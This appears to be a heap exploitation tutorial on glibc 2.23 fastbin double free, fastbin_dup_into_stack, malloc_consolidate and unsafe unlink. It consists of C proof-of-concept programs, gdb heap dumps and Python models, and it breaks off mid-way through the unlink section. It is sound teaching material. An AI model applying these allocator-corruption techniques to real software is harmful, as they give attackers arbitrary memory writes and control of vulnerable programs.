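This program demonstrates a double-free attack on the fastbins, which leaks a pointer to a block of memory that has already been allocated. A fastbin can be viewed as a LIFO stack implemented as a singly linked list and traversed through fastbin->fd. Because free performs a check on the free list, the same chunk cannot be freed twice in a row, so a free of a different chunk is inserted between the two frees to bypass the check. Three mallocs then follow, two of which return the same address, leaving two pointers to the same region of memory.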

The double-free check in libc-2.23 is as follows:

    /* Check that the top of the bin is not the record we are going to add
       (i.e., double free).  */
    if (__builtin_expect (old == p, 0))
      {
        errstr = "double free or corruption (fasttop)";
        goto errout;
      }

When checking for a fastbin double free, it only examines the first chunk in the bin, so the check is flawed.
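To make the weakness concrete, here is a minimal Python model of a single fastbin. It is a sketch rather than glibc's code: the class and method names are made up for illustration, and only the "is this chunk already at the top?" test is reproduced. The chunk addresses are borrowed from the gdb session.

```python
class DoubleFree(Exception):
    pass


class Fastbin:
    """One fastbin: a LIFO singly linked list of chunk addresses."""

    def __init__(self):
        self.top = None   # head of the list (most recently freed chunk)
        self.fd = {}      # chunk address -> next chunk in the list

    def free(self, chunk):
        # The only check made by libc-2.23: is the chunk already at the top?
        if self.top == chunk:
            raise DoubleFree("double free or corruption (fasttop)")
        self.fd[chunk] = self.top
        self.top = chunk

    def malloc(self):
        chunk = self.top
        self.top = self.fd[chunk]
        return chunk


a, b = 0x602000, 0x602020   # chunk a and chunk b

bin0 = Fastbin()
bin0.free(a)
bin0.free(b)
bin0.free(a)                # passes: the top is b, not a
d, e, f = bin0.malloc(), bin0.malloc(), bin0.malloc()
print(hex(d), hex(e), hex(f))

# Freeing the same chunk twice in a row is caught.
try:
    direct = Fastbin()
    direct.free(a)
    direct.free(a)
    caught = False
except DoubleFree:
    caught = True
```

In the model, d and f are the same chunk, matching the program output where the 4th and 6th malloc return the same address.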

After the three mallocs:

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a
0x602010:   0x4141414141414141  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1 <-- top chunk
0x602070:   0x0000000000000000

After the first free, chunk a is added to the fastbins:

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a [be freed]
0x602010:   0x0000000000000000  0x0000000000000000      <-- fd pointer
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)

After the second free, chunk b is added to the fastbins:

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a [be freed]
0x602010:   0x0000000000000000  0x0000000000000000      <-- fd pointer
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b [be freed]
0x602030:   0x0000000000602000  0x0000000000000000      <-- fd pointer
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)

Chunk a is now the second chunk in the bin, so the double-free check does not catch it. After the third free, chunk a is added to the fastbins again:

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a [be freed again]
0x602010:   0x0000000000602020  0x0000000000000000      <-- fd pointer
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b [be freed]
0x602030:   0x0000000000602000  0x0000000000000000      <-- fd pointer
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)  →  [loop detected]

Chunk a and chunk b now form a cycle.

After three more mallocs:

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk d, chunk f
0x602010:   0x4646464646464646  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk e
0x602030:   0x4545454545454545  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000

So for fastbins, a double free can be used to leak a pointer to a heap chunk.

Recompile with the memory-checking flag:

$ gcc -fsanitize=address -g fastbin_dup.c
$ ./a.out
Allocating 3 buffers.
1st malloc(9) 0x60200000eff0 points to AAAAAAAA
2nd malloc(9) 0x60200000efd0 points to BBBBBBBB
3rd malloc(9) 0x60200000efb0 points to CCCCCCCC
Freeing the first one 0x60200000eff0.
Then freeing another one 0x60200000efd0.
Freeing the first one 0x60200000eff0 again.
=================================================================
==5650==ERROR: AddressSanitizer: attempting double-free on 0x60200000eff0 in thread T0:
    #0 0x7fdc18ebf2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
    #1 0x400ba3 in main /home/firmy/how2heap/fastbin_dup.c:22
    #2 0x7fdc18a7d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #3 0x400878 in _start (/home/firmy/how2heap/a.out+0x400878)

0x60200000eff0 is located 0 bytes inside of 9-byte region [0x60200000eff0,0x60200000eff9)
freed by thread T0 here:
    #0 0x7fdc18ebf2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
    #1 0x400b0d in main /home/firmy/how2heap/fastbin_dup.c:18
    #2 0x7fdc18a7d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

previously allocated by thread T0 here:
    #0 0x7fdc18ebf602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x400997 in main /home/firmy/how2heap/fastbin_dup.c:7
    #2 0x7fdc18a7d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

This is an obvious double-free vulnerability. How to exploit this class of bug is covered in detail in later chapters.

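Now for something newer: in libc-2.26, freeing the same chunk twice in a row does not trigger the double-free check at all. This is due to the tcache mechanism, which is described in detail later. For now, here is an example that does trigger the double-free check on that version: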

#include <stdio.h>
#include <stdlib.h>

int main() {
    int i;

    void *p = malloc(0x40);
    fprintf(stderr, "First allocate a fastbin: p=%p\n", p);

    fprintf(stderr, "Then free(p) 7 times\n");
    for (i = 0; i < 7; i++) {
        fprintf(stderr, "free %d: %p => %p\n", i+1, &p, p);
        free(p);
    }

    fprintf(stderr, "Then malloc 8 times at the same address\n");
    int *a[10];
    for (i = 0; i < 8; i++) {
        a[i] = malloc(0x40);
        fprintf(stderr, "malloc %d: %p => %p\n", i+1, &a[i], a[i]);
    }

    fprintf(stderr, "Finally trigger double-free\n");
    for (i = 0; i < 2; i++) {
        fprintf(stderr, "free %d: %p => %p\n", i+1, &a[i], a[i]);
        free(a[i]);
    }
}
$ gcc -g tcache_double-free.c
$ ./a.out
First allocate a fastbin: p=0x559e30950260
Then free(p) 7 times
free 1: 0x7ffc498b2958 => 0x559e30950260
free 2: 0x7ffc498b2958 => 0x559e30950260
free 3: 0x7ffc498b2958 => 0x559e30950260
free 4: 0x7ffc498b2958 => 0x559e30950260
free 5: 0x7ffc498b2958 => 0x559e30950260
free 6: 0x7ffc498b2958 => 0x559e30950260
free 7: 0x7ffc498b2958 => 0x559e30950260
Then malloc 8 times at the same address
malloc 1: 0x7ffc498b2960 => 0x559e30950260
malloc 2: 0x7ffc498b2968 => 0x559e30950260
malloc 3: 0x7ffc498b2970 => 0x559e30950260
malloc 4: 0x7ffc498b2978 => 0x559e30950260
malloc 5: 0x7ffc498b2980 => 0x559e30950260
malloc 6: 0x7ffc498b2988 => 0x559e30950260
malloc 7: 0x7ffc498b2990 => 0x559e30950260
malloc 8: 0x7ffc498b2998 => 0x559e30950260
Finally trigger double-free
free 1: 0x7ffc498b2960 => 0x559e30950260
free 2: 0x7ffc498b2968 => 0x559e30950260
double free or corruption (fasttop)
[2]    1244 abort (core dumped)  ./a.out

fastbin_dup_into_stack

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
    unsigned long long stack_var = 0x21;
    fprintf(stderr, "Allocating 3 buffers.\n");
    char *a = malloc(9);
    char *b = malloc(9);
    char *c = malloc(9);
    strcpy(a, "AAAAAAAA");
    strcpy(b, "BBBBBBBB");
    strcpy(c, "CCCCCCCC");
    fprintf(stderr, "1st malloc(9) %p points to %s\n", a, a);
    fprintf(stderr, "2nd malloc(9) %p points to %s\n", b, b);
    fprintf(stderr, "3rd malloc(9) %p points to %s\n", c, c);

    fprintf(stderr, "Freeing the first one %p.\n", a);
    free(a);
    fprintf(stderr, "Then freeing another one %p.\n", b);
    free(b);
    fprintf(stderr, "Freeing the first one %p again.\n", a);
    free(a);

    fprintf(stderr, "Allocating 4 buffers.\n");
    unsigned long long *d = malloc(9);
    *d = (unsigned long long) (((char*)&stack_var) - sizeof(d));
    fprintf(stderr, "4nd malloc(9) %p points to %p\n", d, &d);
    char *e = malloc(9);
    strcpy(e, "EEEEEEEE");
    fprintf(stderr, "5nd malloc(9) %p points to %s\n", e, e);
    char *f = malloc(9);
    strcpy(f, "FFFFFFFF");
    fprintf(stderr, "6rd malloc(9) %p points to %s\n", f, f);
    char *g = malloc(9);
    strcpy(g, "GGGGGGGG");
    fprintf(stderr, "7th malloc(9) %p points to %s\n", g, g);
}
$ gcc -g fastbin_dup_into_stack.c
$ ./a.out
Allocating 3 buffers.
1st malloc(9) 0xcf2010 points to AAAAAAAA
2nd malloc(9) 0xcf2030 points to BBBBBBBB
3rd malloc(9) 0xcf2050 points to CCCCCCCC
Freeing the first one 0xcf2010.
Then freeing another one 0xcf2030.
Freeing the first one 0xcf2010 again.
Allocating 4 buffers.
4nd malloc(9) 0xcf2010 points to 0x7ffd1e0d48b0
5nd malloc(9) 0xcf2030 points to EEEEEEEE
6rd malloc(9) 0xcf2010 points to FFFFFFFF
7th malloc(9) 0x7ffd1e0d48b0 points to GGGGGGGG

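This program shows how to modify the fd pointer so that it points to a forged free chunk, causing malloc to return a chunk at the forged address. Most of the program is the same as the previous one and the vulnerability is again a double free; only the value written into fd differs.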

After the three mallocs:

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a
0x602010:   0x4141414141414141  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1 <-- top chunk
0x602070:   0x0000000000000000

After the three frees:

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a [be freed twice]
0x602010:   0x0000000000602020  0x0000000000000000      <-- fd pointer
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b [be freed]
0x602030:   0x0000000000602000  0x0000000000000000      <-- fd pointer
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)  →  [loop detected]

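After this malloc, instead of filling the chunk with a meaningless "DDDDDDDD", we write an address, namely the address of stack_var minus 0x8, which forges a free chunk on the stack (any other address would work too). This is also why stack_var is set to 0x21 (0x20 works as well): with the fake chunk starting 0x8 bytes below stack_var, stack_var itself serves as the fake chunk's size field.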

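When glibc serves an allocation whose size falls in the fastbin range, it looks for a chunk in the corresponding bin. It computes a fastbin index from the candidate chunk's size field and compares it with the index of the bin the chunk was taken from; if the two do not match, the chunk's size field has been corrupted. The fake chunk's size field therefore has to be set to a valid value.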

/* offset 2 to use otherwise unindexable first 2 bins */
#define fastbin_index(sz) \
  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)

  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
    {
      idx = fastbin_index (nb);
      [...]

      if (victim != 0)
        {
          if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
            {
              errstr = "malloc(): memory corruption (fast)";
              [...]
            }
            [...]
        }
    }
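The index comparison in the excerpt above can be mimicked in a few lines of Python. This is only a sketch that assumes a 64-bit build (SIZE_SZ == 8); the helper passes_fastbin_check is a made-up name, while chunksize and fastbin_index mirror the glibc macros. It shows that the three low flag bits of the size field are ignored, which is why both 0x20 and 0x21 are accepted for stack_var.

```python
SIZE_SZ = 8          # assumed: 64-bit build
SIZE_BITS = 0x7      # PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA
UINT_MASK = 0xFFFFFFFF


def chunksize(size_field: int) -> int:
    """Strip the three flag bits from a chunk's size field."""
    return size_field & ~SIZE_BITS


def fastbin_index(sz: int) -> int:
    """Mirror of the fastbin_index macro, including the unsigned int cast."""
    shift = 4 if SIZE_SZ == 8 else 3
    return (((sz & UINT_MASK) >> shift) - 2) & UINT_MASK


def passes_fastbin_check(size_field: int, nb: int) -> bool:
    """True if a chunk with this size field may be returned for request size nb."""
    return fastbin_index(chunksize(size_field)) == fastbin_index(nb)


nb = 0x20   # chunk size used for malloc(9)
for candidate in (0x20, 0x21, 0x2F, 0x30, 0x0):
    print(hex(candidate), passes_fastbin_check(candidate, nb))
```

Any size field from 0x20 to 0x2f lands in the same bin as the 0x20 chunks; 0x30 and 0x0 do not.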

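Put simply, the fake chunk's size only needs to match the size of the double-freed chunk. After the fourth malloc and the write through d, the heap looks like this: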

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk d
0x602010:   0x00007fffffffdc30  0x0000000000000000      <-- fd pointer
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b [be freed]
0x602030:   0x0000000000602000  0x0000000000000000      <-- fd pointer
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  p &stack_var
$4 = (unsigned long long *) 0x7fffffffdc38
gef➤  x/5gx 0x7fffffffdc38-0x8
0x7fffffffdc30: 0x0000000000000000  0x0000000000000021 <-- fake chunk [seems to be freed]
0x7fffffffdc40: 0x0000000000602010  0x0000000000602010      <-- fd pointer
0x7fffffffdc50: 0x0000000000602030
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x7fffffffdc40, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602020, size=0x0, flags=) [incorrect fastbin_index]

As shown, the forged chunk is now linked into the fastbins through the fd pointer. Two more mallocs move the forged chunk to the head of the list:

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021
0x602010:   0x4646464646464646  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021
0x602030:   0x4545454545454545  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000021
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x7fffffffdc40, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602020, size=0x0, flags=) [incorrect fastbin_index]

One more malloc then allocates memory at the fake chunk:

gef➤  x/5gx 0x7fffffffdc38-0x8
0x7fffffffdc30: 0x0000000000000000  0x0000000000000021 <-- fake chunk
0x7fffffffdc40: 0x4747474747474747  0x0000000000602000
0x7fffffffdc50: 0x0000000000602030

So for fastbins, a double free can be used to overwrite the fastbin structure and obtain a pointer to an arbitrary address.
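The whole sequence can be replayed on a toy memory model. The sketch below is not glibc code: memory is a Python dict of 8-byte words, only one fastbin is modelled, and the only checks kept are the fasttop test in free and the size test in malloc. The addresses are the ones from the gdb session, and the function names free and malloc are stand-ins for the real allocator.

```python
# Toy memory: address -> 8-byte value.
mem = {}
CHUNK_A, CHUNK_B = 0x602000, 0x602020
STACK_VAR = 0x7FFFFFFFDC38
HDR = 0x10            # prev_size + size fields on 64-bit

fastbin_top = None


def free(chunk):
    """Push a chunk onto the fastbin; its fd lives in the first user-data word."""
    global fastbin_top
    if fastbin_top == chunk:
        raise RuntimeError("double free or corruption (fasttop)")
    mem[chunk + HDR] = fastbin_top or 0
    fastbin_top = chunk


def malloc():
    """Pop the top chunk after checking its size field, return the user pointer."""
    global fastbin_top
    chunk = fastbin_top
    if (mem.get(chunk + 8, 0) & ~0x7) != 0x20:
        raise RuntimeError("malloc(): memory corruption (fast)")
    fastbin_top = mem.get(chunk + HDR, 0) or None
    return chunk + HDR


mem[CHUNK_A + 8] = 0x21
mem[CHUNK_B + 8] = 0x21
mem[STACK_VAR] = 0x21          # doubles as the fake chunk's size field

free(CHUNK_A)
free(CHUNK_B)
free(CHUNK_A)                  # double free, not caught

d = malloc()                   # chunk a, still linked in the bin
mem[d] = STACK_VAR - 8         # overwrite its fd with the fake chunk address
e = malloc()                   # chunk b
f = malloc()                   # chunk a again; the bin now leads to the stack
g = malloc()                   # fake chunk on the stack
print(hex(d), hex(e), hex(f), hex(g))
```

In the model g comes out as the address of stack_var plus 8, which matches the 0x7fffffffdc40 location that receives "GGGGGGGG" in the gdb output.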

fastbin_dup_consolidate

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

int main() {
    void *p1 = malloc(0x10);
    void *p2 = malloc(0x10);
    strcpy(p1, "AAAAAAAA");
    strcpy(p2, "BBBBBBBB");
    fprintf(stderr, "Allocated two fastbins: p1=%p p2=%p\n", p1, p2);

    fprintf(stderr, "Now free p1!\n");
    free(p1);

    void *p3 = malloc(0x400);
    fprintf(stderr, "Allocated large bin to trigger malloc_consolidate(): p3=%p\n", p3);
    fprintf(stderr, "In malloc_consolidate(), p1 is moved to the unsorted bin.\n");

    free(p1);
    fprintf(stderr, "Trigger the double free vulnerability!\n");
    fprintf(stderr, "We can pass the check in malloc() since p1 is not fast top.\n");

    void *p4 = malloc(0x10);
    strcpy(p4, "CCCCCCC");
    void *p5 = malloc(0x10);
    strcpy(p5, "DDDDDDDD");
    fprintf(stderr, "Now p1 is in unsorted bin and fast bin. So we'will get it twice: %p %p\n", p4, p5);
}
$ gcc -g fastbin_dup_consolidate.c
$ ./a.out
Allocated two fastbins: p1=0x17c4010 p2=0x17c4030
Now free p1!
Allocated large bin to trigger malloc_consolidate(): p3=0x17c4050
In malloc_consolidate(), p1 is moved to the unsorted bin.
Trigger the double free vulnerability!
We can pass the check in malloc() since p1 is not fast top.
Now p1 is in unsorted bin and fast bin. So we'will get it twice: 0x17c4010 0x17c4010

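This program shows how the malloc_consolidate mechanism, triggered by a large bin allocation, can be used to bypass the fastbin double-free check. The same check was demonstrated in fastbin_dup, which bypassed it by inserting a free of a different chunk between the two frees.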

First, allocate two fast chunks:

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p1
0x602010:   0x4141414141414141  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000020fc1  <-- top chunk
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000

Free p1, and the freed chunk is added to the fastbins:

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p1 [be freed]
0x602010:   0x0000000000000000  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000020fc1  <-- top chunk
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)

Freeing p1 again at this point would inevitably trigger the double-free error. If a large chunk is allocated first, however, the result is:

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p1 [be freed]
0x602010:   0x00007ffff7dd1b88  0x00007ffff7dd1b88      <-- fd, bk pointer
0x602020:   0x0000000000000020  0x0000000000000020  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000411  <-- chunk p3
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] 0x00
gef➤  heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
[+] Found 1 chunks in 1 small non-empty bins.

The chunk has disappeared from the fastbins and now appears in the small bins instead, and both the prev_size and size fields of chunk p2 have been modified.

Here is how a large chunk is allocated:

  /*
     If this is a large request, consolidate fastbins before continuing.
     While it might look excessive to kill all fastbins before
     even seeing if there is space available, this avoids
     fragmentation problems normally associated with fastbins.
     Also, in practice, programs tend to have runs of either small or
     large requests, but less often mixtures, so consolidation is not
     invoked all that often in most programs. And the programs that
     it is called frequently in otherwise tend to fragment.
   */

  else
    {
      idx = largebin_index (nb);
      if (have_fastchunks (av))
        malloc_consolidate (av);
    }

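When a large chunk is allocated, malloc first computes the index of the matching large bin from the chunk size, then checks whether the fast bins of the current arena contain any chunks. If they do, it calls malloc_consolidate() to merge the chunks in the fast bins and add the resulting free chunks to the unsorted bin. Because the request here is for a large chunk, the chunks in the unsorted bin are then sorted by size back into the small bins or large bins.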

Since p1 is no longer at the top of the fastbins, it can be freed again:

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p1 [double freed]
0x602010:   0x0000000000000000  0x00007ffff7dd1b88
0x602020:   0x0000000000000020  0x0000000000000020  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000411  <-- chunk p3
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
gef➤  heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
[+] Found 1 chunks in 1 small non-empty bins.

p1 is put into the fastbins again, so it now sits in both the fastbins and the small bins.

On the first malloc, the chunk is taken from the fastbins:

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p1 [be freed], chunk p4
0x602010:   0x0043434343434343  0x00007ffff7dd1b88
0x602020:   0x0000000000000020  0x0000000000000020  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000411  <-- chunk p3
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] 0x00
gef➤  heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
[+] Found 1 chunks in 1 small non-empty bins.

On the second malloc, the chunk is taken from the small bins:

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p4, chunk p5
0x602010:   0x4444444444444444  0x00007ffff7dd1b00
0x602020:   0x0000000000000020  0x0000000000000021  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000411  <-- chunk p3
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000

Chunks p4 and p5 are at the same location.
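The bookkeeping behind this walkthrough can be summarized with a deliberately small Python model. It is a sketch under strong simplifications: ToyArena and its methods are hypothetical names, only one fastbin and one small bin are tracked, and chunk merging as well as the unsorted bin are collapsed into a single step.

```python
class ToyArena:
    """Just enough allocator state to replay fastbin_dup_consolidate."""

    def __init__(self):
        self.fastbin = []    # LIFO: the last element is the top
        self.smallbin = []   # FIFO list for the same chunk size

    def free_fast(self, chunk):
        if self.fastbin and self.fastbin[-1] == chunk:
            raise RuntimeError("double free or corruption (fasttop)")
        self.fastbin.append(chunk)

    def malloc_large(self):
        # A large request first drains the fastbins (malloc_consolidate);
        # the chunks end up in the small bin once the unsorted bin is sorted.
        self.smallbin.extend(self.fastbin)
        self.fastbin.clear()

    def malloc_small(self):
        if self.fastbin:
            return self.fastbin.pop()
        return self.smallbin.pop(0)


p1 = 0x602010
arena = ToyArena()
arena.free_fast(p1)
arena.malloc_large()         # p3 = malloc(0x400)
arena.free_fast(p1)          # the fastbin is empty, so the check passes
p4 = arena.malloc_small()    # served from the fastbin
p5 = arena.malloc_small()    # served from the small bin
print(hex(p4), hex(p5))

# Without the large allocation in between, the second free is rejected.
plain = ToyArena()
plain.free_fast(p1)
try:
    plain.free_fast(p1)
    rejected = False
except RuntimeError:
    rejected = True
```

Both allocations return p1, once from each bin, which is the same outcome as p4 and p5 in the program output.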

unsafe_unlink

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

uint64_t *chunk0_ptr;

int main() {
    int malloc_size = 0x80; // not fastbins
    int header_size = 2;

    chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0
    uint64_t *chunk1_ptr  = (uint64_t*) malloc(malloc_size); //chunk1
    fprintf(stderr, "The global chunk0_ptr is at %p, pointing to %p\n", &chunk0_ptr, chunk0_ptr);
    fprintf(stderr, "The victim chunk we are going to corrupt is at %p\n\n", chunk1_ptr);

    // pass this check: (P->fd->bk != P || P->bk->fd != P) == False
    chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);
    chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);
    fprintf(stderr, "Fake chunk fd: %p\n", (void*) chunk0_ptr[2]);
    fprintf(stderr, "Fake chunk bk: %p\n\n", (void*) chunk0_ptr[3]);
    // pass this check: (chunksize(P) != prev_size(next_chunk(P))) == False
    // chunk0_ptr[1] = 0x0; // or 0x8, 0x80

    uint64_t *chunk1_hdr = chunk1_ptr - header_size;
    chunk1_hdr[0] = malloc_size;
    chunk1_hdr[1] &= ~1;

    // deal with tcache
    // int *a[10];
    // int i;
    // for (i = 0; i < 7; i++) {
    //   a[i] = malloc(0x80);
    // }
    // for (i = 0; i < 7; i++) {
    //   free(a[i]);
    // }
    free(chunk1_ptr);

    char victim_string[9];
    strcpy(victim_string, "AAAAAAAA");
    chunk0_ptr[3] = (uint64_t) victim_string;
    fprintf(stderr, "Original value: %s\n", victim_string);

    chunk0_ptr[0] = 0x4242424242424242LL;
    fprintf(stderr, "New Value: %s\n", victim_string);
}
$ gcc -g unsafe_unlink.c
$ ./a.out
The global chunk0_ptr is at 0x601070, pointing to 0x721010
The victim chunk we are going to corrupt is at 0x7210a0

Fake chunk fd: 0x601058
Fake chunk bk: 0x601060

Original value: AAAAAAAA
New Value: BBBBBBBB

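This program shows how free can be used to overwrite the global pointer chunk0_ptr and obtain an arbitrary memory write, a technique known as unsafe unlink. Its most common setting is a program that has an overflow vulnerability and a global pointer.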

Ubuntu 16.04 uses libc-2.23, whose unlink implementation is shown below. It contains several checks on the neighboring chunks, which are what we need to bypass:

/* Take a chunk off a bin list */
#define unlink(AV, P, BK, FD) {                                            \
    FD = P->fd;                                      \
    BK = P->bk;                                      \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))              \
      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
    else {                                      \
        FD->bk = BK;                                  \
        BK->fd = FD;                                  \
